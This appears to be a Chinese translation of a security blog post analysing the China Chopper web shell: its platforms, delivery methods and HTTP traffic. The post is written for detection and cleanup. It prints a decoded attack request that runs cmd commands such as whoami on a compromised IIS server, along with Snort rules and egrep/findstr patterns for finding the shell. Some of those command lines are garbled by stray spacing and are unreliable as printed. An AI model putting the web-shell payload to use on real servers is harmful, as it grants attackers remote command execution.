【Web Shell】- 技术剖析中国菜刀 - Part II

在第一部分，简单描述了中国菜刀的基本功能。本文我将剖析中国菜刀的平台多功能性、传输机制、交互模式和检测。我希望通过我的讲解，您能够根据您的环境检测出并清除它。

平台

那么中国菜刀可以在哪些平台上运行？答案是任何能够运行JSP、ASP、ASPX、PHP、CFM的Web服务器。这些是大多数Web应用程序语言。那么操作系统呢？中国菜刀足够灵活，可以在Windows和Linux上运行。这种操作系统和应用程序的灵活性使其成为一个更危险的Web shell。

在本系列的第一部分中，我们展示了使用ASPX在Windows 2003 IIS服务器上执行中国菜刀。现在我们将展示它在Linux上运行PHP。如图1所示，PHP版本的内容同样简约：

虽然可用选项因中国菜刀运行的平台而异，但Linux中的文件管理功能与Windows中的类似。如图：

下图显示的数据库客户端示例是MySQL而不是MS-SQL，但它提供了许多相同的功能。

虚拟终端看起来很熟悉，但是使用Linux命令而不是Windows，因为它们最终由底层操作系统解释。

传输机制

由于恶意软件的有效负载的大小，格式和简单性，中国菜刀的交付机制可以非常灵活。可以使用以下任何机制来传递这种基于文本的小型有效负载：

• WebDAV文件上传
• JBoss jmx-console或Apache Tomcat管理页面（有关此攻击向量的更多详细信息，请阅读FireEye顾问Tony Lee的解释）
• 远程利用文件丢弃
• 来自其他访问的横向传播

流量分析

我们现在已经看到了服务器端有效负载和用于控制Web shell的客户端。现在让我们来看看中国菜刀的流量。幸运的是，我们有服务器和客户端组件，因此我们可以启动数据包捕获来查看典型流量的内容。如图所示，客户端使用HTTP POST方法通过TCP端口80启动连接。

因为这是TCP流量，我们可以在Wireshark（一种在Unix和Windows中运行的流行的开源网络协议分析器）中“跟踪TCP”流。在下图中，顶部的红色流量来自攻击者（Web客户端）。底部显示为蓝色的流量是目标（Web shell）的响应。我们可以看到大多数攻击者流量都是Base64编码的。

如上所述，大多数攻击者流量似乎是Base64编码的。但这不是问题，因为它可以很容易地解码。我们使用免费的Fiddler Web调试器的“TextWizard”功能来发现攻击者发送的内容。（注意：％3D是等号的URL编码表示（“=”）.Fiddler需要将其转换为等号才能正确解码。）

原始传输数据：

Password=Response.Write("->|");

var err:Exception;try{eval(System.Text.Encoding.GetEncoding().

GetString(System. Convert.FromBase64String

("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5n

LkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZX

N0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0

ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2

U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0

SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZX

RTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0

KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZS

hvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D")),"unsafe");}catch(err){Response.Write

("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgImM6

XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

Fiddler Web调试器文本向导可以轻松地将原始流量从Base64转换为纯文本。如图：

解码之后的数据：

varc=newSystem.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding().

GetString(System.Convert.FromBase64String(Request.Item["z1"])));

vare=newSystem.Diagnostics.Process();

varout:System.IO.StreamReader,EI:System.IO.StreamReader;

c.UseShellExecute=false;

c.RedirectStandardOutput=true;c.RedirectStandardError=true;

e.StartInfo=c;c.Arguments="/c"+System.Text.Encoding.GetEncoding().

GetString(System.Convert.FromBase64String(Request.Item["z2"]));

e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();

Response.Write(out.ReadToEnd()+EI.ReadToEnd());

最终我们有更好可读性。但是，我们的Base64解码数据现在正在尝试解码更多存储为z1和z2的Base64数据。回到我们的攻击者数据，在“密码”参数结束后，我们看到z1和z2参数。

我在以下输出中突出显示了Base64编码的参数z1和z2：

＆z1 = Y21k＆z2 = Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ％3D％3D

Base64解码的参数z1和z2：

z1 = cmdz2 = cd / d“c：\ inetpub \ wwwroot \”＆whoami＆echo [S]＆cd＆echo [E]

这解释了客户端如何与shell通信。“Password”参数将代码传递给服务端。z1是cmd，z2包含通过cmd / c发送的命令提示符的参数。所有输出都被回发给攻击者，它会对whoami  命令和当前工作目录创建以下响应：

->|nt authority\network service[S]C:\Inetpub\wwwroot[E]|<-

检测

既然我们了解了中国菜刀的内容及其流量，我们就可以专注于在网络和主机层面检测这种害虫的方法。

网络

使用标准的Snort IDS，可以相对轻松地捕获此流量。Keith Tyler在他早期的中国菜刀博客文章中提供了一个基本的IDS签名  ：

alert tcp any any -> any  ( sid:; content:"base64_decode";

http_client_body;flow:to_server,established; content:"POST"; nocase;

http_method; ;msg:"Webshell Detected Apache";)

为了减少误报，我们通过查找“FromBase64String”和“z1”的内容来收紧Snort IDS签名以关注中国菜刀，如下所示：

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 

(msg: "China Chopper with first Command Detected";

flow:to_server,established; content: "FromBase64String";

content: "z1"; content:"POST"; nocase;http_method;

reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/

breaking-down-the-china-chopper-web-shell-part-i.html;

classtype:web-application-attack; sid: ;)

以下IDS签名查找“FromBase64String”的内容以及“z”后跟一到三位的任意组合 - 例如，它会找到“z1”，“z10”或“z100”。想法：如果第一个命令错过（z1），你仍然会捕获后续命令。

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 

(msg: "China Chopper with all Commands Detected"; flow:to_server,established;

content: "FromBase64String"; content: "z"; pcre: "/Z\d{1,3}/i"; content:"POST"; nocase;http_method;

reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/

breaking-down-the-china-chopper-web-shell-part-i.html;

classtype:web-application-attack; sid: ;)

当考虑深度和偏移时，可以修改这两个IDS签名以进一步优化。在实现和测试签名以确保性能之前，请务必放入有效的SID。

现在我们已经讨论了网络级别的检测，我们将看到主机级别的检测也是可能的。由于shell必须包含可预测的语法，因此我们可以快速尝试查找具有该代码的文件。

主机

可以使用许多方法查找包含中国菜刀的文件。最快捷，最简单的方法，特别是在Linux机器上，可能使用正则表达式。如图所示，跨Web目录的快速egrep可以帮助识别受感染的文件。

egrep -re'[<] [？] php \ s \ @eval [（] \ $ _ POST \ [。+ \] [）]; [？] [>]'* .php

egrep和regex  命令是一个强大的组合。虽然正则表达式可能看起来像胡言乱语，但它确实没有看起来那么糟糕。

Windows还提供了一种使用native findstr命令使用正则表达式搜索文件的方法。

您可能已经注意到我们必须稍微更改正则表达式。这是解决findtr解释正则表达式的一些方法所必需的。您将运行的命令如下：

findstr / R“[<] [？] php。\ @ eval [（] \ $ _ POST。* [）]; [？] [>]”* .php

这些示例显示了PHP shell中的检测。要查找ASPX shell，只需修改正则表达式以适合ASPX shell的语法，如下所示：

egrep -re'[<] \％\ @ \ sPage \ sLanguage = .script。\％[>] [<] \％eval.Request \ .Item。+ unsafe'* .aspx
findstr / R“[<] \％\ @。Page.Language = .script。\％[>] [<] \％eval.Request \ .Item。* unsafe”* .aspx

如果您不确定Windows主机上的所有PHP或ASPX文件的位置，可以使用带有一些扩展选项的dir命令来帮助您识别可能要运行我们的正则表达式的 Web文件（参见图）。

dir / S / A / B * .php

Findstr还有一个搜索所有子目录的选项（参见图13）。

findstr / R / S“[<] [？] php。\ @ eval [（] \ $ _ POST。* [）]; [？] [>]”* .php

结语

我希望通过这篇文章，能让大家对中国菜刀的功能、平台多功能性、交付机制、流量分析和检测能够有所了解。